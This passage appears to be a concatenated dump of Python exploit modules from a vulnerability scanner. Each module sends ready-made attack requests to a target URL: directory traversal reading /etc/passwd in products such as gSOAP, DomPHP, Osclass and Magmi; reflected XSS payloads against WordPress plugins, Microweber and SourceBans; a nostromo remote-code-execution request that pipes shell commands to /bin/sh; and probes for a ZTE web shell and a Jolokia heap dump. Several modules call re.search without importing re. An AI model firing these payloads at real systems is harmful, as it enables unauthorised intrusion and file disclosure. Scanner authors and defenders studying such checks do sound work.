'/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/gsoap-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''gSOAP 2.8 - Directory Traversal''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/47653" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["gsoap", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/../../../../../../../../../etc/passwd""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language': 'tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection': 'close'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (re.search(r"""root:[x*]:0:0""",resp0.text)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-10037.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''DomPHP 0.83 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/30865", 13 | "https://www.cvedetails.com/cve/CVE-2014-10037", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2014-10037" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-10037", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "root:" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-2166.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Ericsson Drutt MSDP (Instance Monitor) Directory Traversal''', 9 | "description": '''Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/36619", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-2166" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2015-2166", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "lfi", "ericsson"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-0378.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Microweber Reflected Cross-Site Scripting''', 9 | "description": '''Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0378" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", 16 | "cvss-score": "5.4", 17 | "cve-id": "CVE-2022-0378", 18 | "cwe-id": "CWE-79" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "shodan-query":'''http.favicon.hash:780351152''' 23 | }, 24 | "tags": ["cve", "cve2022", "microweber", "xss"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "mwui_init" in resp.text and 'onmousemove="alert(document.domain)' in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/mida-eframework-xss.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Mida eFramework - Cross Site Scripting''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | "" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["mida", "xss"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/MUP/""" 39 | method = "POST" 40 | data = """UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': '{{Hostname}}/MUP'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and (""">""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2019/CVE-2019-16278.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''nostromo 1.9.6 - Remote Code Execution''', 9 | "description": '''Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://www.exploit-db.com/raw/47837" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2019-16278", 18 | "cwe-id": "CWE-22" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2019", "rce"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/.%0d./.%0d./.%0d./.%0d./bin/sh""" 39 | method = "POST" 40 | data = """echo 41 | echo 42 | cat /etc/passwd 2>&1""" 43 | headers = {} 44 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 45 | 46 | if (re.search(r"""root:.*:0:0:""",resp0.text)): 47 | result["success"] = True 48 | result["info"] = info() 49 | result["payload"] = url+path 50 | 51 | except: 52 | result["success"] = False 53 | 54 | return result 55 | 56 | 57 | # Exploit, can be same with poc() 58 | def exp(url): 59 | return poc(url) 60 | 61 | 62 | # Utils 63 | def format_url(url): 64 | url = url.strip() 65 | if not ( url.startswith('http://') or url.startswith('https://') ): 66 | url = 'http://' + url 67 | url = url.rstrip('/') 68 | 69 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2321.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ZTE Cable Modem Web Shell''', 9 | "description": '''web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/", 13 | "https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-2321", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["iot", "cve", "cve2014", "zte"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/web_shell_cmd.gch' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "please input shell command" in resp.text and "ZTE Corporation. All rights reserved" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-6308.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Osclass Security Advisory 3.4.1 - Local File Inclusion''', 9 | "description": '''A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-6308" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-6308", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-6920.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)''', 9 | "description": '''WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/133371/", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-6920" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and '">' in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/jolokia/jolokia-heap-info-disclosure.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Jolokia Java Heap Information Disclosure''', 9 | "description": '''''', 10 | "severity": "info", 11 | "references": [ 12 | "" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["jolokia", "disclosure", "java"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/jolokia/""" 39 | method = "POST" 40 | data = """ 41 | { 42 | "type":"EXEC", 43 | "mbean":"com.sun.management:type=HotSpotDiagnostic", 44 | "operation":"dumpHeap", 45 | "arguments":[ 46 | "/tmp1234/test1.hprof", 47 | 0 48 | ] 49 | }""" 50 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 51 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 52 | 53 | if ("""stacktrace":"java.io.IOException: No such file or directory""" in resp0.text): 54 | result["success"] = True 55 | result["info"] = info() 56 | result["payload"] = url+path 57 | 58 | except: 59 | result["success"] = False 60 | 61 | return result 62 | 63 | 64 | # Exploit, can be same with poc() 65 | def exp(url): 66 | return poc(url) 67 | 68 | 69 | # Utils 70 | def format_url(url): 71 | url = url.strip() 72 | if not ( url.startswith('http://') or url.startswith('https://') ): 73 | url = 'http://' + url 74 | url = url.rstrip('/') 75 | 76 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-8349.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''SourceBans XSS''', 9 | "description": '''Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-8349" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 16 | "cvss-score": "6.1", 17 | "cve-id": "CVE-2015-8349", 18 | "cwe-id": "CWE-79" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2015", "xss", "sourcebans"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/" in str(resp.headers): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-3744.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Node.js st module Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-3744", 13 | "https://github.com/advisories/GHSA-69rr-wvh9-6c4q", 14 | "https://snyk.io/vuln/npm:st:20140206" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 18 | "cvss-score": "7.5", 19 | "cve-id": "CVE-2014-3744", 20 | "cwe-id": "CWE-22" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "lfi", "nodejs", "st"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "root:" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-2067.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Magento Server Magmi Plugin - Directory Traversal''', 9 | "description": '''Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35996", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-2067" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "lfi", "magento", "magmi", "plugin"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-0432.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Mastodon Prototype Pollution Vulnerability''', 9 | "description": '''The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09", 13 | "https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0432" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 18 | "cvss-score": "6.1", 19 | "cve-id": "CVE-2022-0432", 20 | "cwe-id": "CWE-1321" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2022", "mastodon", "prototype"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/embed.js' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "if (data.type !== 'setHeight' || !iframes[data.id]) {" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-2248.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''Apache Struts - Multiple Open Redirection Vulnerabilities''', 10 | "description": '''Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.''', 11 | "severity": "low", 12 | "references": [ 13 | "https://www.exploit-db.com/exploits/38666", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2013-2248", 15 | "https://cwiki.apache.org/confluence/display/WW/S2-017" 16 | ], 17 | "classification": { 18 | "cvss-metrics": "", 19 | "cvss-score": "", 20 | "cve-id": "CVE-2013-2248", 21 | "cwe-id": "" 22 | }, 23 | "metadata":{ 24 | "vuln-target": "", 25 | 26 | }, 27 | "tags": ["cve", "cve2013", "apache", "redirect", "struts"], 28 | } 29 | 30 | 31 | # Vender Fingerprint 32 | def fingerprint(url): 33 | return True 34 | 35 | # Proof of Concept 36 | def poc(url): 37 | result = {} 38 | try: 39 | url = format_url(url) 40 | path = '/index.action?redirect:http://www.example.com/' 41 | 42 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 43 | if re.search(r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', resp.text): 44 | result["success"] = True 45 | result["info"] = info() 46 | result["payload"] = url+path 47 | 48 | except: 49 | result["success"] = False 50 | 51 | return result 52 | 53 | 54 | # Exploit, can be same with poc() 55 | def exp(url): 56 | return poc(url) 57 | 58 | 59 | # Utils 60 | def format_url(url): 61 | url = url.strip() 62 | if not ( url.startswith('http://') or url.startswith('https://') ): 63 | url = 'http://' + url 64 | url = url.rstrip('/') 65 | 66 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-3526.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2013-3526" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2013-3526", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2013", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "text/html" in str(resp.headers) and "" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | 